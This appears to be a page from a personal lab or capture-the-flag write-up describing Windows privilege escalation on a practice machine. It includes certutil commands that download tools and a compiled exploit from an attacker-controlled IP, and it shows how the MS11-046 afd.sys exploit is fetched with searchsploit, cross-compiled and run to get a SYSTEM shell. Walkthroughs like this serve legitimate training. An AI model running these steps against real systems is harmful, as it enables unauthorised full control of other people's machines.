Privilege escalation

Chekcing for system type

systeminfo

I found that it is using x86 architecture. So, I will transfer x86 version of winpeas and run it.

# In kali linux:
python3 -m http.server 8000 -d  /usr/share/peass/winpeas/

cd C:\Users\Public
certutil -urlcache -f http://192.168.45.183:8000/winPEASx86.exe winpeas.exe

Transfer the file.

Not able to run it.

Impersonating user.

The current user is the web server user (livda\apache). This user has the SeImpersonatePrivilege enabled. Using this privilege, we can attempt to escalate privileges and gain access as the NT AUTHORITY\SYSTEM user. Let’s proceed with abusing this privilege.

Abusing Other Windows Components | Tips To Securehacking.tipstosecure.com

Not working.

Working {took help}

Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046)Exploit Database

I will be using this exploit.

┌──(kali㉿kali)-[~/pg/authby]
└─$ searchsploit -m 40564
  Exploit: Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046)
      URL: https://www.exploit-db.com/exploits/40564
     Path: /usr/share/exploitdb/exploits/windows_x86/local/40564.c
    Codes: CVE-2011-1249, MS11-046
 Verified: True
File Type: C source, ASCII text
Copied to: /home/kali/pg/authby/40564.c



┌──(kali㉿kali)-[~/pg/authby]
└─$ sudo apt install mingw-w64
mingw-w64 is already the newest version (12.0.0-3).
mingw-w64 set to manually installed.
The following packages were automatically installed and are no longer required:
  fonts-liberation2         libgfapi0      libibverbs1        libpython3.11-minimal  librdmacm1t64      python3.11-dev
  ibverbs-providers         libgfrpc0      libjsoncpp25       libpython3.11-stdlib   perl-modules-5.38  python3.11-minimal
  libboost-iostreams1.83.0  libgfxdr0      libperl5.38t64     libpython3.11t64       python3-lib2to3    samba-vfs-modules
  libcephfs2                libglusterfs0  libpython3.11-dev  librados2              python3.11         xcape
Use 'sudo apt autoremove' to remove them.

Summary:
  Upgrading: 0, Installing: 0, Removing: 0, Not Upgrading: 1934

┌──(kali㉿kali)-[~/pg/authby]
└─$ i686-w64-mingw32-gcc 40564.c -o exploit.exe -lws2_32

┌──(kali㉿kali)-[~/pg/authby]
└─$ ls -l exploit.exe
-rwxrwxr-x 1 kali kali 241555 Jan  5 13:21 exploit.exe

I have complited the exploit. Now i will send it to victim machine.

python3 -m http.server 8000

certutil -urlcache -f http://192.168.45.191:8000/exploit.exe exploit.exe

Run it.

.\exploit.exe

You will get the shell as NT System user.

Previousport 242 Nextlocal.txt & proof.txt

Last updated 1 year ago

Was this helpful?

hashtagImpersonating user.

hashtagWorking {took help}

Impersonating user.

Working {took help}